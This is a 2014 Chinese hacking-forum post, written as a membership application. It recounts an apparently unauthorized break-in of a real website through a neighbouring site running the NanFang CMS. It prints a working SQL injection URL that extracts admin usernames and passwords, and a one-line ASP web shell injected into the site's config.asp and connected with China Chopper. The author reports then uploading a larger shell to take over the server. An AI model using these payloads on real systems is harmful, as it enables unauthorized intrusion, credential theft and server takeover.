记一次不算成功的检测
###########################################Title :一次不算成功的检测(08sec申请转正帖)
#Time : 2014年5月5日
#Team:08sec team
#Author : Vocin
#首发 : 08安全小组
#######################################
小白文章 没任何亮点 利用的0day也是早就都知道的
=========================
利用的语句
/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
=========================
今天偶然发现一个站点
结果没有可以利用的地方,只有静态网页
好吧 先御剑扫下目录
有个后台 看看
试了弱口令 admin admin;admin888 admin888 等等 都不行
好吧 慢慢来
好像有FCK可以利用 点开看看
好吧 没的利用
慢慢来吧 先旁站下
找到一个网站
还是御剑扫下目录先
有个后台 看下
是个南方站的后台 阿弥陀佛 老衲记得南方站有个0day
试试看
既然如此 那就进后台看看吧
有数据库备份 可惜有限制
不过我看到个网站配置 而且可以修改 我顿时就邪恶了
南方后台不是可以在网站配置中插入一句话 然后菜刀连接 http://www.xxx.com/inc/config.asp
试试看
"%><%execute(request("1"))%><%'
菜刀连接之
成功连接 感谢上帝
然后就上传大马什么的拿到shell了
虽然拿到shell了 但是还不太会提权 也就这样了后续的没法继续下去
纯粹小白文一篇所以打算来08学习 增长知识 希望以后能有更大的进步
- 图片没有显示,重新编辑一下哦 管理02 发表于 2014-5-5 16:10
图片没有显示,重新编辑一下哦
已修改 Vocin 发表于 2014-5-5 20:52
已修改
文章质量一般,但是对于而爱学习的程度,欢迎一起学习、
页:
[1]